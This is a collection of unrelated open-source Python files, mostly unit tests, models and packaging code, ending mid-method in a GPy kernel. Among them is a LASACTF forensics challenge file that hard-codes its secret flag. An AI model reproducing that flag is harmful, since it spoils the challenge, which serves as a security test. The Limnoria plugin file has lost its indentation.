    sys.exit(0)

# Clear any toolchain overrides inherited from the calling environment so
# the test starts from a known state.
for key in ['CC', 'CXX', 'LINK', 'CC_host', 'CXX_host', 'LINK_host',
            'NM_target', 'READELF_target']:
    if key in os.environ:
        del os.environ[key]
def CheckCompiler(test, gypfile, check_for, run_gyp):
    """Build *gypfile* (regenerating build files first when *run_gyp* is
    true) and assert the build output contains every line in *check_for*."""
    if run_gyp:
        test.run_gyp(gypfile)
    test.build(gypfile)
    output = test.stdout()
    test.must_contain_all_lines(output, check_for)
test = TestGyp.TestGyp(formats=['ninja'])

# Force a flavored ninja format: toolchain environment overrides must also
# work for generator flavors.
test.formats = ['ninja-my_flavor' if f == 'ninja' else f for f in test.formats]
def TestTargetOverideSharedLib():
    """Check CC/CXX/NM/READELF overrides when building a shared library.

    NM/READELF are exercised by the TOC-generation step for the shared
    library; the marker files RAN_MY_NM / RAN_MY_READELF prove they ran.
    """
    expected = ['my_cc.py', 'my_cxx.py', 'FOO']
    env = {'CC': 'python %s/my_cc.py FOO' % here,
           'CXX': 'python %s/my_cxx.py FOO' % here,
           'NM': 'python %s/my_nm.py' % here,
           'READELF': 'python %s/my_readelf.py' % here}
    with TestGyp.LocalEnv(env):
        CheckCompiler(test, 'compiler-shared-lib.gyp', expected, True)
    test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
    test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')
    test.unlink(test.built_file_path('RAN_MY_NM'))
    test.unlink(test.built_file_path('RAN_MY_READELF'))
    # Rebuild without re-running gyp and with the environment restored:
    # the overrides must have been baked into the generated build files.
    CheckCompiler(test, 'compiler-shared-lib.gyp', expected, False)
    test.must_contain(test.built_file_path('RAN_MY_NM'), 'RAN_MY_NM')
    test.must_contain(test.built_file_path('RAN_MY_READELF'), 'RAN_MY_READELF')

TestTargetOverideSharedLib()
test.pass_test()
|
data/JetBrains/python-skeletons/numpy/core/__init__.py
|
from . import multiarray

# Type-checking skeleton stub: nothing is re-exported publicly here.
__all__ = []
|
data/NervanaSystems/neon/tests/test_pool_layer.py
|
"""
Pooling layer tests
"""
import itertools as itt
import numpy as np
from neon import NervanaObject
from neon.layers.layer import Pooling
from tests.utils import allclose_with_out
def pytest_generate_tests(metafunc):
    """Parametrize the 'poolargs' fixture with pooling configurations.

    With --all a larger grid of filter sizes, paddings, feature-map counts,
    input sizes and batch sizes is generated; otherwise a small smoke grid.
    """
    np.random.seed(1)
    if metafunc.config.option.all:
        bsz_rng = [32, 64]
    else:
        bsz_rng = [128]

    if 'poolargs' in metafunc.fixturenames:
        fargs = []
        if metafunc.config.option.all:
            fs_rng = [2, 3, 5]
            pad_rng = [0, 1]
            nifm_rng = [16, 32]
            in_sz_rng = [8, 16]
        else:
            fs_rng = [2, 4]
            pad_rng = [0, 1]
            nifm_rng = [8]
            in_sz_rng = [8]
        fargs_ = []
        for fs in fs_rng:
            # Python 2 integer division: fs/2 stays an int here.
            stride_rng = set([1, fs/2, fs])
            # NOTE(review): this crosses the full fs_rng with the stride set
            # derived from a single fs, so each product repeats all filter
            # sizes -- presumably [fs] was intended; confirm against usage.
            fargs_.append(itt.product(fs_rng, nifm_rng, pad_rng, stride_rng, in_sz_rng, bsz_rng))
        fargs = itt.chain(*fargs_)
        metafunc.parametrize('poolargs', fargs)
def ref_pooling(inp, inp_shape, fshape, padding, strides, be, ncheck=None):
    """NumPy reference max-pooling used to validate the backend layer.

    :param inp: backend tensor of shape (C*H*W, batch); read via .get()
    :param inp_shape: logical (C, H, W) shape of one sample
    :param fshape: (filter_h, filter_w)
    :param padding: symmetric zero padding
    :param strides: (stride_h, stride_w)
    :param be: backend, used only for output_dim()
    :param ncheck: None (all batch items), an int (random subset of that
        size) or an explicit index list
    :returns: (expected output array, sorted batch indices checked)
    """
    inp_lshape = list(inp_shape)
    bsz = inp.shape[-1]
    # Select which batch columns to verify.
    if ncheck is None:
        check_inds = np.arange(bsz)
    elif type(ncheck) is int:
        check_inds = np.random.permutation(bsz)
        check_inds = check_inds[0:ncheck]
    else:
        check_inds = ncheck
    check_inds = np.sort(check_inds)

    inp_lshape.append(bsz)
    inpa = inp.get().reshape(inp_lshape)
    outshape = (inp_lshape[0],
                be.output_dim(inp_lshape[1], fshape[0], padding, strides[0], pooling=True),
                be.output_dim(inp_lshape[2], fshape[1], padding, strides[1], pooling=True),
                len(check_inds))
    if padding > 0:
        # Zero-pad spatial dims symmetrically before pooling.
        padded_shape = (inp_lshape[0],
                        inp_lshape[1]+2*padding,
                        inp_lshape[2]+2*padding,
                        inp_lshape[-1])
        inp_pad = np.zeros(padded_shape)
        inp_pad[:, padding:-padding, padding:-padding, :] = inpa[:, 0:, 0:, :]
    else:
        inp_pad = inpa
    # Naive quadruple loop: max over each pooling window, per channel and
    # per checked batch column.
    out_exp = np.zeros(outshape)
    for indC in range(outshape[0]):
        for indh in range(outshape[1]):
            hrng = (indh*strides[0], indh*strides[0] + fshape[0])
            for indw in range(outshape[2]):
                wrng = (indw*strides[1], indw*strides[1] + fshape[1])
                for cnt, indb in enumerate(check_inds):
                    inp_check = inp_pad[indC, hrng[0]:hrng[1], wrng[0]:wrng[1], indb]
                    out_exp[indC, indh, indw, cnt] = np.max(inp_check)
    return (out_exp, check_inds)
def test_padding(backend_default, poolargs):
    """Compare backend Pooling.fprop against the NumPy reference."""
    fshape, nifm, padding, stride, in_sz, batch_size = poolargs
    NervanaObject.be.bsz = batch_size

    inshape = (nifm, in_sz, in_sz)
    insize = np.prod(inshape)

    neon_layer = Pooling(fshape=fshape, strides=stride, padding=padding)
    inp = neon_layer.be.array(np.random.random((insize, batch_size)))
    inp.lshape = inshape
    neon_layer.configure(inshape)
    # prev_layer must be truthy for deltas to be allocated.
    neon_layer.prev_layer = True
    neon_layer.allocate()
    neon_layer.set_deltas([neon_layer.be.iobuf(inshape)])
    out = neon_layer.fprop(inp).get()

    # Spot-check first, middle and last batch columns (Py2 int division).
    ncheck = [0, batch_size/2, batch_size-1]
    (out_exp, check_inds) = ref_pooling(inp, inp.lshape,
                                        (fshape, fshape),
                                        padding,
                                        (stride, stride),
                                        neon_layer.be,
                                        ncheck=ncheck)
    out_shape = list(out_exp.shape[0:3])
    out_shape.append(batch_size)
    outa = out.reshape(out_shape)

    # Max pooling must match the reference exactly (no tolerance).
    assert allclose_with_out(out_exp, outa[:, :, :, check_inds], atol=0.0, rtol=0.0)
|
data/OpenKMIP/PyKMIP/kmip/tests/unit/core/messages/payloads/test_discover_versions.py
|
from six.moves import xrange
from testtools import TestCase
from kmip.core import utils
from kmip.core.messages.contents import ProtocolVersion
from kmip.core.messages.payloads import discover_versions
class TestDiscoverVersionsRequestPayload(TestCase):
    """Unit tests for the DiscoverVersions request payload codec."""

    def setUp(self):
        super(TestDiscoverVersionsRequestPayload, self).setUp()

        self.protocol_versions_empty = list()
        self.protocol_versions_one = list()
        self.protocol_versions_one.append(ProtocolVersion.create(1, 0))
        self.protocol_versions_two = list()
        self.protocol_versions_two.append(ProtocolVersion.create(1, 1))
        self.protocol_versions_two.append(ProtocolVersion.create(1, 0))

        # Raw TTLV encodings of request payloads carrying zero, one and two
        # ProtocolVersion structures.
        self.encoding_empty = utils.BytearrayStream((
            b'\x42\x00\x79\x01\x00\x00\x00\x00'))
        self.encoding_one = utils.BytearrayStream((
            b'\x42\x00\x79\x01\x00\x00\x00\x28\x42\x00\x69\x01\x00\x00\x00\x20'
            b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00'
            b'\x00'))
        self.encoding_two = utils.BytearrayStream((
            b'\x42\x00\x79\x01\x00\x00\x00\x50\x42\x00\x69\x01\x00\x00\x00\x20'
            b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x69\x01\x00\x00\x00\x20\x42\x00\x6A\x02\x00\x00\x00\x04'
            b'\x00\x00\x00\x01\x00\x00\x00\x00\x42\x00\x6B\x02\x00\x00\x00\x04'
            b'\x00\x00\x00\x00\x00\x00\x00\x00'))

    def tearDown(self):
        super(TestDiscoverVersionsRequestPayload, self).tearDown()

    def test_init_with_none(self):
        # Construction with no arguments must succeed.
        discover_versions.DiscoverVersionsRequestPayload()

    def test_init_with_args(self):
        discover_versions.DiscoverVersionsRequestPayload(
            self.protocol_versions_empty)

    def test_validate_with_invalid_protocol_versions(self):
        # A non-list protocol_versions value must be rejected.
        kwargs = {'protocol_versions': 'invalid'}
        self.assertRaisesRegexp(
            TypeError, "invalid protocol versions list",
            discover_versions.DiscoverVersionsRequestPayload, **kwargs)

    def test_validate_with_invalid_protocol_version(self):
        # A list entry that is not a ProtocolVersion must be rejected.
        kwargs = {'protocol_versions': ['invalid']}
        self.assertRaisesRegexp(
            TypeError, "invalid protocol version",
            discover_versions.DiscoverVersionsRequestPayload, **kwargs)

    def _test_read(self, stream, payload, protocol_versions):
        # Decode stream into payload and compare the resulting protocol
        # version list, element by element, against expectations.
        payload.read(stream)
        expected = len(protocol_versions)
        observed = len(payload.protocol_versions)
        msg = "protocol versions list decoding mismatch"
        msg += "; expected {0} results, received {1}".format(
            expected, observed)
        self.assertEqual(expected, observed, msg)
        for i in xrange(len(protocol_versions)):
            expected = protocol_versions[i]
            observed = payload.protocol_versions[i]
            msg = "protocol version decoding mismatch"
            msg += "; expected {0}, received {1}".format(expected, observed)
            self.assertEqual(expected, observed, msg)

    def test_read_with_empty_protocol_list(self):
        stream = self.encoding_empty
        payload = discover_versions.DiscoverVersionsRequestPayload()
        protocol_versions = self.protocol_versions_empty
        self._test_read(stream, payload, protocol_versions)

    def test_read_with_one_protocol_version(self):
        stream = self.encoding_one
        payload = discover_versions.DiscoverVersionsRequestPayload()
        protocol_versions = self.protocol_versions_one
        self._test_read(stream, payload, protocol_versions)

    def test_read_with_two_protocol_versions(self):
        stream = self.encoding_two
        payload = discover_versions.DiscoverVersionsRequestPayload()
        protocol_versions = self.protocol_versions_two
        self._test_read(stream, payload, protocol_versions)

    def _test_write(self, payload, expected):
        # Encode payload into a fresh stream and require a byte-exact match.
        stream = utils.BytearrayStream()
        payload.write(stream)
        length_expected = len(expected)
        length_received = len(stream)
        msg = "encoding lengths not equal"
        msg += "; expected {0}, received {1}".format(
            length_expected, length_received)
        self.assertEqual(length_expected, length_received, msg)
        msg = "encoding mismatch"
        msg += ";\nexpected:\n{0}\nreceived:\n{1}".format(expected, stream)
        self.assertEqual(expected, stream, msg)

    def test_write_with_empty_protocol_list(self):
        payload = discover_versions.DiscoverVersionsRequestPayload(
            self.protocol_versions_empty)
        expected = self.encoding_empty
        self._test_write(payload, expected)

    def test_write_with_one_protocol_version(self):
        payload = discover_versions.DiscoverVersionsRequestPayload(
            self.protocol_versions_one)
        expected = self.encoding_one
        self._test_write(payload, expected)

    def test_write_with_two_protocol_versions(self):
        payload = discover_versions.DiscoverVersionsRequestPayload(
            self.protocol_versions_two)
        expected = self.encoding_two
        self._test_write(payload, expected)
class TestDiscoverVersionsResponsePayload(TestCase):
    """Unit tests for the DiscoverVersions response payload codec."""

    def setUp(self):
        super(TestDiscoverVersionsResponsePayload, self).setUp()

        self.protocol_versions_empty = list()
        self.protocol_versions_one = list()
        self.protocol_versions_one.append(ProtocolVersion.create(1, 0))
        self.protocol_versions_two = list()
        self.protocol_versions_two.append(ProtocolVersion.create(1, 1))
        self.protocol_versions_two.append(ProtocolVersion.create(1, 0))

        # Raw TTLV encodings of response payloads carrying zero, one and two
        # ProtocolVersion structures.
        self.encoding_empty = utils.BytearrayStream((
            b'\x42\x00\x7C\x01\x00\x00\x00\x00'))
        self.encoding_one = utils.BytearrayStream((
            b'\x42\x00\x7C\x01\x00\x00\x00\x28\x42\x00\x69\x01\x00\x00\x00\x20'
            b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00'
            b'\x00'))
        self.encoding_two = utils.BytearrayStream((
            b'\x42\x00\x7C\x01\x00\x00\x00\x50\x42\x00\x69\x01\x00\x00\x00\x20'
            b'\x42\x00\x6A\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x6B\x02\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
            b'\x42\x00\x69\x01\x00\x00\x00\x20\x42\x00\x6A\x02\x00\x00\x00\x04'
            b'\x00\x00\x00\x01\x00\x00\x00\x00\x42\x00\x6B\x02\x00\x00\x00\x04'
            b'\x00\x00\x00\x00\x00\x00\x00\x00'))

    def tearDown(self):
        super(TestDiscoverVersionsResponsePayload, self).tearDown()

    def test_init_with_none(self):
        # Construction with no arguments must succeed.
        discover_versions.DiscoverVersionsResponsePayload()

    def test_init_with_args(self):
        discover_versions.DiscoverVersionsResponsePayload(
            self.protocol_versions_empty)

    def test_validate_with_invalid_protocol_versions(self):
        # A non-list protocol_versions value must be rejected.
        kwargs = {'protocol_versions': 'invalid'}
        self.assertRaisesRegexp(
            TypeError, "invalid protocol versions list",
            discover_versions.DiscoverVersionsResponsePayload, **kwargs)

    def test_validate_with_invalid_protocol_version(self):
        # A list entry that is not a ProtocolVersion must be rejected.
        kwargs = {'protocol_versions': ['invalid']}
        self.assertRaisesRegexp(
            TypeError, "invalid protocol version",
            discover_versions.DiscoverVersionsResponsePayload, **kwargs)

    def _test_read(self, stream, payload, protocol_versions):
        # Decode stream into payload and compare the resulting protocol
        # version list, element by element, against expectations.
        payload.read(stream)
        expected = len(protocol_versions)
        observed = len(payload.protocol_versions)
        msg = "protocol versions list decoding mismatch"
        msg += "; expected {0} results, received {1}".format(
            expected, observed)
        self.assertEqual(expected, observed, msg)
        for i in xrange(len(protocol_versions)):
            expected = protocol_versions[i]
            observed = payload.protocol_versions[i]
            msg = "protocol version decoding mismatch"
            msg += "; expected {0}, received {1}".format(expected, observed)
            self.assertEqual(expected, observed, msg)

    def test_read_with_empty_protocol_list(self):
        stream = self.encoding_empty
        payload = discover_versions.DiscoverVersionsResponsePayload()
        protocol_versions = self.protocol_versions_empty
        self._test_read(stream, payload, protocol_versions)

    def test_read_with_one_protocol_version(self):
        stream = self.encoding_one
        payload = discover_versions.DiscoverVersionsResponsePayload()
        protocol_versions = self.protocol_versions_one
        self._test_read(stream, payload, protocol_versions)

    def test_read_with_two_protocol_versions(self):
        stream = self.encoding_two
        payload = discover_versions.DiscoverVersionsResponsePayload()
        protocol_versions = self.protocol_versions_two
        self._test_read(stream, payload, protocol_versions)

    def _test_write(self, payload, expected):
        # Encode payload into a fresh stream and require a byte-exact match.
        stream = utils.BytearrayStream()
        payload.write(stream)
        length_expected = len(expected)
        length_received = len(stream)
        msg = "encoding lengths not equal"
        msg += "; expected {0}, received {1}".format(
            length_expected, length_received)
        self.assertEqual(length_expected, length_received, msg)
        msg = "encoding mismatch"
        msg += ";\nexpected:\n{0}\nreceived:\n{1}".format(expected, stream)
        self.assertEqual(expected, stream, msg)

    def test_write_with_empty_protocol_list(self):
        payload = discover_versions.DiscoverVersionsResponsePayload(
            self.protocol_versions_empty)
        expected = self.encoding_empty
        self._test_write(payload, expected)

    def test_write_with_one_protocol_version(self):
        payload = discover_versions.DiscoverVersionsResponsePayload(
            self.protocol_versions_one)
        expected = self.encoding_one
        self._test_write(payload, expected)

    def test_write_with_two_protocol_versions(self):
        payload = discover_versions.DiscoverVersionsResponsePayload(
            self.protocol_versions_two)
        expected = self.encoding_two
        self._test_write(payload, expected)
|
data/ProgVal/Limnoria/plugins/Owner/__init__.py
|
"""
Provides commands useful to the owner of the bot; the commands here require
their caller to have the 'owner' capability. This plugin is loaded by default.
"""
import supybot
import supybot.world as world
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
__contributors__ = {}
from . import config
from . import plugin
from imp import reload
reload(plugin)
if world.testing:
from . import test
Class = plugin.Class
configure = config.configure
|
data/SmartTeleMax/iktomi/tests/storage.py
|
# Public test cases exposed by this module.
__all__ = ['LocalMemStorageTest', 'MemcachedStorageTest']

import unittest

from iktomi.storage import LocalMemStorage, MemcachedStorage
class LocalMemStorageTest(unittest.TestCase):
    """Behavioral tests for the in-process LocalMemStorage backend."""

    def test_set(self):
        '`LocalMemStorage` set method'
        storage = LocalMemStorage()
        storage.set('key', 'value')
        self.assertEqual(storage.storage['key'], 'value')

    def test_set_rewrite(self):
        '`LocalMemStorage` set method of existing key'
        storage = LocalMemStorage()
        for value in ('value', 'value1'):
            storage.set('key', value)
        # The latest write wins.
        self.assertEqual(storage.storage['key'], 'value1')

    def test_get(self):
        '`LocalMemStorage` get method'
        storage = LocalMemStorage()
        # Missing key: None without a default, else the default.
        self.assertEqual(storage.get('key'), None)
        self.assertEqual(storage.get('key', '1'), '1')
        storage.set('key', 'value')
        self.assertEqual(storage.get('key'), 'value')

    def test_delete(self):
        '`LocalMemStorage` delete method'
        storage = LocalMemStorage()
        # Deleting a missing key is still reported as success.
        self.assertEqual(storage.delete('key'), True)
        storage.set('key', 'value')
        self.assertEqual(storage.delete('key'), True)
        self.assertEqual(storage.get('key'), None)
class MemcachedStorageTest(unittest.TestCase):
    """Tests for the memcached-backed storage; needs a live local memcached."""

    def setUp(self):
        self.storage = MemcachedStorage('localhost:11211')
        # Fail fast when no memcached instance is reachable.
        if not self.storage.storage.set('test', 'test'):
            raise Exception('memcached is down')

    def tearDown(self):
        client = self.storage.storage
        for key in ('test', 'key'):
            client.delete(key)
        client.disconnect_all()

    def test_set(self):
        '`MemcachedStorage` set method'
        # Both the initial write and the overwrite report success.
        self.assertEqual(self.storage.set('key', 'value'), True)
        self.assertEqual(self.storage.set('key', 'value1'), True)

    def test_get(self):
        '`MemcachedStorage` get method'
        self.assertEqual(self.storage.get('key'), None)
        self.assertEqual(self.storage.get('key', 'default'), 'default')
        self.storage.set('key', 'value')
        self.assertEqual(self.storage.get('key'), 'value')

    def test_delete(self):
        '`MemcachedStorage` delete method'
        # Deleting a missing key is still reported as success.
        self.assertEqual(self.storage.delete('key'), True)
        self.storage.set('key', 'value')
        self.assertEqual(self.storage.delete('key'), True)
        self.assertEqual(self.storage.get('key'), None)
|
data/MongoEngine/django-mongoengine/django_mongoengine/mongo_admin/templatetags/mongoadmintags.py
|
from django import template
from django.conf import settings

# Template-tag registry for this module's tags.
register = template.Library()
class CheckGrappelli(template.Node):
    """Template node that stores whether 'grappelli' is installed into the
    context variable named *var_name*."""

    def __init__(self, var_name):
        self.var_name = var_name

    def render(self, context):
        grappelli_installed = 'grappelli' in settings.INSTALLED_APPS
        context[self.var_name] = grappelli_installed
        # Nodes that only mutate the context render to nothing.
        return ''
def check_grappelli(parser, token):
    """
    Checks whether grappelli is in installed apps and sets a variable in the
    context. Unfortunately there is no other way to find out if grappelli is
    used or not.
    See: https://github.com/sehmaschine/django-grappelli/issues/32

    Usage: {% check_grappelli as <varname> %}
    """
    bits = token.contents.split()
    # Expect exactly: tag name, 'as', variable name.
    if len(bits) != 3:
        raise template.TemplateSyntaxError("'check_grappelli' tag takes exactly two arguments.")
    if bits[1] != 'as':
        raise template.TemplateSyntaxError("The second argument to 'check_grappelli' must be 'as'")
    return CheckGrappelli(bits[2])

register.tag(check_grappelli)
|
data/VinF/deer/setup.py
|
from setuptools import setup, find_packages

# NOTE(review): `deer` is imported but never referenced below -- presumably a
# smoke check that the package is importable at build time; confirm.
import deer

# Packaging metadata.
NAME = 'deer'
VERSION = '0.1'
AUTHOR = "Vincent Francois-Lavet"
AUTHOR_EMAIL = "v.francois@ulg.ac.be"
URL = 'https://github.com/VinF/General_Deep_Q_RL'
DESCRIPTION = 'Framework for deep reinforcement learning'
with open('README.md') as f:
    LONG_DESCRIPTION = f.read()
CLASSIFIERS = [
    'Development Status :: 3 - Alpha',
    'Environment :: Console',
    'Intended Audience :: Developers',
    'Intended Audience :: Science/Research',
    'Intended Audience :: Education',
    'License :: OSI Approved :: BSD License',
    'Operating System :: OS Independent',
    'Programming Language :: Python :: 2.7',
    'Programming Language :: Python :: 3',
    'Programming Language :: Python :: 3.3',
    'Programming Language :: Python :: 3.4',
    'Topic :: Scientific/Engineering',
    'Topic :: Utilities',
    'Topic :: Software Development :: Libraries',
]

if __name__ == '__main__':
    setup(name=NAME,
          version=VERSION,
          author=AUTHOR,
          author_email=AUTHOR_EMAIL,
          url=URL,
          description=DESCRIPTION,
          long_description=LONG_DESCRIPTION,
          license='BSD',
          classifiers=CLASSIFIERS,
          platforms='any',
          packages=find_packages())
|
data/Pylons/shootout/shootout/models.py
|
import cryptacular.bcrypt
from sqlalchemy import (
Table,
Column,
ForeignKey,
)
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relation,
backref,
column_property,
synonym,
joinedload,
)
from sqlalchemy.types import (
Integer,
Unicode,
UnicodeText,
)
from sqlalchemy.sql import func
from sqlalchemy.ext.declarative import declarative_base
from zope.sqlalchemy import ZopeTransactionExtension
from pyramid.security import (
Everyone,
Authenticated,
Allow,
)
# Thread-local session integrated with the Zope transaction manager.
DBSession = scoped_session(sessionmaker(extension=ZopeTransactionExtension()))
Base = declarative_base()
crypt = cryptacular.bcrypt.BCRYPTPasswordManager()

def hash_password(password):
    # bcrypt-hash the password; unicode() marks this as Python 2 code.
    return unicode(crypt.encode(password))
class User(Base):
    """
    Application's user model.
    """
    __tablename__ = 'users'
    user_id = Column(Integer, primary_key=True)
    username = Column(Unicode(20), unique=True)
    name = Column(Unicode(50))
    email = Column(Unicode(50))
    # Voting tallies: votes received on own ideas / votes cast on others'.
    hits = Column(Integer, default=0)
    misses = Column(Integer, default=0)
    delivered_hits = Column(Integer, default=0)
    delivered_misses = Column(Integer, default=0)

    # Stored bcrypt hash; exposed via the `password` property below so that
    # assignment always hashes.
    _password = Column('password', Unicode(60))

    def _get_password(self):
        return self._password

    def _set_password(self, password):
        # Never store the raw password: hash on assignment.
        self._password = hash_password(password)

    password = property(_get_password, _set_password)
    # synonym makes `password` usable in queries, mapped onto `_password`.
    password = synonym('_password', descriptor=password)

    def __init__(self, username, password, name, email):
        self.username = username
        self.name = name
        self.email = email
        self.password = password

    @classmethod
    def get_by_username(cls, username):
        return DBSession.query(cls).filter(cls.username == username).first()

    @classmethod
    def check_password(cls, username, password):
        """Return True iff *username* exists and *password* matches."""
        user = cls.get_by_username(username)
        if not user:
            return False
        return crypt.check(user.password, password)
# Many-to-many association between ideas and tags.
ideas_tags = Table('ideas_tags', Base.metadata,
    Column('idea_id', Integer, ForeignKey('ideas.idea_id')),
    Column('tag_id', Integer, ForeignKey('tags.tag_id'))
)
class Tag(Base):
    """
    Idea's tag model.
    """
    __tablename__ = 'tags'
    tag_id = Column(Integer, primary_key=True)
    name = Column(Unicode(50), unique=True, index=True)

    def __init__(self, name):
        self.name = name

    @staticmethod
    def extract_tags(tags_string):
        """Split a user-supplied tag string (space/comma/semicolon
        separated) into a set of lowercased tag names."""
        normalized = tags_string.replace(';', ' ').replace(',', ' ')
        return set(word.lower() for word in normalized.split())

    @classmethod
    def get_by_name(cls, tag_name):
        return DBSession.query(cls).filter(cls.name == tag_name).first()

    @classmethod
    def create_tags(cls, tags_string):
        """Return Tag objects for every name in *tags_string*, creating
        (and adding to the session) any that do not exist yet."""
        tags = []
        for tag_name in cls.extract_tags(tags_string):
            existing = cls.get_by_name(tag_name)
            if not existing:
                existing = Tag(name=tag_name)
                DBSession.add(existing)
            tags.append(existing)
        return tags

    @classmethod
    def tag_counts(cls):
        """(tag name, idea count) pairs for tags that have ideas."""
        query = DBSession.query(Tag.name, func.count('*'))
        return query.join('ideas').group_by(Tag.name)
# Many-to-many association recording which users voted on which ideas.
voted_users = Table('ideas_votes', Base.metadata,
    Column('idea_id', Integer, ForeignKey('ideas.idea_id')),
    Column('user_id', Integer, ForeignKey('users.user_id'))
)
class Idea(Base):
    """An idea with hit/miss voting; rows with a target are comments."""
    __tablename__ = 'ideas'
    idea_id = Column(Integer, primary_key=True)
    # Self-referential FK: a comment points at the idea it targets.
    target_id = Column(Integer, ForeignKey('ideas.idea_id'))
    comments = relation('Idea', cascade="delete",
                        backref=backref('target', remote_side=idea_id))
    author_id = Column(Integer, ForeignKey('users.user_id'))
    author = relation(User, cascade="delete", backref='ideas')
    title = Column(UnicodeText)
    text = Column(UnicodeText)
    hits = Column(Integer, default=0)
    misses = Column(Integer, default=0)
    tags = relation(Tag, secondary=ideas_tags, backref='ideas')
    # lazy='dynamic' so voter membership can be filtered in SQL.
    voted_users = relation(User, secondary=voted_users, lazy='dynamic',
                           backref='voted_ideas')

    # Computed in the database; coalesce covers the 0-vote division by zero.
    # NOTE(review): with integer columns many backends evaluate
    # hits/(hits+misses) with integer division -- confirm intended result.
    hit_percentage = func.coalesce(hits / (hits + misses) * 100, 0)
    hit_percentage = column_property(hit_percentage.label('hit_percentage'))
    total_votes = column_property((hits + misses).label('total_votes'))
    vote_differential = column_property(
        (hits - misses).label('vote_differential')
    )

    @classmethod
    def get_query(cls, with_joinedload=True):
        # Eager-load tags and author to avoid N+1 queries in listings.
        query = DBSession.query(cls)
        if with_joinedload:
            query = query.options(joinedload('tags'), joinedload('author'))
        return query

    @classmethod
    def get_by_id(cls, idea_id, with_joinedload=True):
        query = cls.get_query(with_joinedload)
        return query.filter(cls.idea_id == idea_id).first()

    @classmethod
    def get_by_tagname(cls, tag_name, with_joinedload=True):
        query = cls.get_query(with_joinedload)
        return query.filter(Idea.tags.any(name=tag_name))

    @classmethod
    def ideas_bunch(cls, order_by, how_many=10, with_joinedload=True):
        # Top-level ideas only (target == None excludes comments).
        query = cls.get_query(with_joinedload).join('author')
        query = query.filter(cls.target == None).order_by(order_by)
        return query.limit(how_many).all()

    def user_voted(self, username):
        """True iff the named user already voted on this idea."""
        return bool(self.voted_users.filter_by(username=username).first())

    def vote(self, user, positive):
        """Record *user*'s vote, updating idea, author and voter tallies."""
        if positive:
            self.hits += 1
            self.author.hits += 1
            user.delivered_hits += 1
        else:
            self.misses += 1
            self.author.misses += 1
            user.delivered_misses += 1
        # Remember the voter so user_voted() can prevent double votes.
        self.voted_users.append(user)
class RootFactory(object):
    """Pyramid root factory exposing the application-wide static ACL."""

    __acl__ = [
        (Allow, Everyone, 'view'),
        (Allow, Authenticated, 'post')
    ]

    def __init__(self, request):
        # No per-request state is needed; the ACL above is static.
        pass
|
data/achillean/shodan-python/shodan/cli/converter/__init__.py
|
from .csvc import *
from .kml import *
|
data/LASACTF/LASACTF-Problems/Problems/Forensics/Rise-of-the-machines/challenge.py
|
from hacksport.problem import Challenge
class Problem(Challenge):
    """Forensics challenge with a fixed (non-templated) flag."""

    def setup(self):
        # Static flag value for this challenge; must not be altered.
        self.flag = '2b7639993c09f171d4c524b4433fc43d269b5a3af36be9caebb3ebf4a142200944bae1'
|
data/SheffieldML/GPy/GPy/kern/src/periodic.py
|
import numpy as np
from .kern import Kern
from ...util.linalg import mdot
from ...util.decorators import silence_errors
from ...core.parameterization.param import Param
from paramz.transformations import Logexp
class Periodic(Kern):
    """Base class for kernels of the periodic subspace (up to n_freq
    frequencies) of a stationary RKHS; only input_dim=1 is supported.

    Subclasses are expected to set the cosine feature basis
    (basis_alpha/basis_omega/basis_phi) and the inverse Gram matrix Gi in
    parameters_changed().
    """

    def __init__(self, input_dim, variance, lengthscale, period, n_freq, lower, upper, active_dims, name):
        """
        :param input_dim: number of input dimensions (must be 1)
        :type input_dim: int
        :param variance: the variance of the Matern kernel
        :type variance: float
        :param lengthscale: the lengthscale of the Matern kernel
        :type lengthscale: np.ndarray of size (input_dim,)
        :param period: the period
        :type period: float
        :param n_freq: the number of frequencies considered for the periodic subspace
        :type n_freq: int
        :param lower: lower bound of the integration interval
        :param upper: upper bound of the integration interval
        :rtype: kernel object
        """
        assert input_dim==1, "Periodic kernels are only defined for input_dim=1"
        super(Periodic, self).__init__(input_dim, active_dims, name)
        self.input_dim = input_dim
        self.lower,self.upper = lower, upper
        self.n_freq = n_freq
        # Two basis functions (cos and sin) per frequency.
        self.n_basis = 2*n_freq
        self.variance = Param('variance', np.float64(variance), Logexp())
        self.lengthscale = Param('lengthscale', np.float64(lengthscale), Logexp())
        self.period = Param('period', np.float64(period), Logexp())
        self.link_parameters(self.variance, self.lengthscale, self.period)

    def _cos(self, alpha, omega, phase):
        # Return the map f(x) = alpha*cos(omega*x + phase), vectorized over
        # the basis arrays.
        def f(x):
            return alpha*np.cos(omega*x + phase)
        return f

    @silence_errors
    def _cos_factorization(self, alpha, omega, phase):
        # Collapse each row's sum of cosines (sharing a frequency) into a
        # single cosine r*cos(omega*x + psi).
        r1 = np.sum(alpha*np.cos(phase),axis=1)[:,None]
        r2 = np.sum(alpha*np.sin(phase),axis=1)[:,None]
        r = np.sqrt(r1**2 + r2**2)
        # arctan branch corrected when r1 < 0; arcsin fallback at r1 == 0.
        psi = np.where(r1 != 0, (np.arctan(r2/r1) + (r1<0.)*np.pi),np.arcsin(r2))
        return r,omega[:,0:1], psi

    @silence_errors
    def _int_computation(self,r1,omega1,phi1,r2,omega2,phi2):
        # Integral over [lower, upper] of products of factorized cosines.
        # Gint2 is the equal-frequency limit, substituted where Gint1 hit a
        # 0/0 (NaN) at omega1 == omega2.
